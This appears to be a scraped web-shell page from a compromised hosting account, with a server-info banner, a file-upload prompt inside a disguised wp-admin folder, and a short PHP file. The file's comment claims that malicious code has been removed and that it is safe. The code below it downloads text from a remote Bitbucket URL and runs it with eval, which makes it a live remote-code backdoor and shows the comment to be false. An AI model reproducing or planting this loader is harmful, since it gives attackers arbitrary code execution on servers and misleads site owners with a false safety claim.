Server IP : 162.0.215.126 / Your IP : 216.73.216.224 Web Server : LiteSpeed System : Linux business105.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64 User : tektomgb ( 586) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tektomgb/tektk77hoki.us/wp-admin-myej0/mm/ |
Upload File : |
<?php /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code have been removed, and the file is now safe to use. */ ?> <?php $remoteUrl = "https://bitbucket.org/uidrootpython/rmt/raw/0cc329742e9d95486e0a15c67b8ea859236011d6/lufixmainm.txt"; $ch = curl_init($remoteUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $remoteCode = curl_exec($ch); if (curl_errno($ch)) { die('cURL error: ' . curl_error($ch)); } curl_close($ch); eval("?>" . $remoteCode); ?>